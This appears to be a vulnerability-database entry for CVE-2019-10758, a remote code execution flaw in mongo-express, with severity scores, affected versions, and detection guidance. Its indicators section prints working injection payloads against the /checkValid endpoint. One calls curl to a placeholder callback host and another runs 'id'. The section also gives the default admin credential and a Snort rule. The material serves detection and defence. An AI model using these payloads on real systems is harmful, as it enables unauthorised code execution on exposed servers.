cbcvebase.
CVE-2019-10758
published 2019-12-24

CVE-2019-10758: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform…

PriorityP193critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
84.84%
99.7th percentile
mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.

Affected

3 ranges
VendorProductVersion rangeFixed in
mongo-express_projectmongo-express< 0.54.00.54.0
mongo-express_projectmongo-express
mongo-express_projectmongo-express>= 0 < 0.54.00.54.0

Detection & IOCsextracted from sources · hover to see the quote

url/checkValid
commanddocument=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}")
commanddocument=this.constructor.constructor("return pr")().mainModule.require("child_process").execSync("id")
port8081
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Mongo-Express RCE Inbound (CVE-2019-10758)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/checkValid"; http.request_body; content:"document=this.constructor"; content:"execSync"; distance:0; fast_pattern; reference:cve,2019-10758; reference:url,github.com/masahiro331/CVE-2019-10758; reference:url,blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; classtype:attempted-admin; sid:2033113; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_06_08, cve CVE_2019_10758, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_06_08;)
  • Exploit targets the POST /checkValid endpoint; detect POST requests to this URI path on mongo-express instances.
  • Payload body contains the string 'document=this.constructor' combined with 'execSync' — both must be present in the POST body to indicate exploitation.
  • Shodan/FOFA fingerprinting: mongo-express instances are identifiable by HTTP title 'Mongo Express' or 'mongo express', commonly exposed on port 8081.
  • The default Basic Auth header 'YWRtaW46cGFzcw==' (admin:pass) is used in exploit attempts against mongo-express; alert on this credential in Authorization headers to /checkValid.
  • The vulnerability is exploited via the toBSON method misusing the vm dependency; look for child_process.execSync calls originating from mongo-express process.
  • ·Vulnerable versions are mongo-express before 0.54.0 only; instances running 0.54.0 or higher are not affected.
  • ·The Emerging Threats Snort rule (sid:2033113) is tagged with confidence Medium and deployment Perimeter — tune accordingly for internal/containerized mongo-express deployments.

CVSS provenance

nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
ghsa9.9CRITICAL
osv9.9CRITICAL
vulncheck9.9CRITICAL
cisa9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.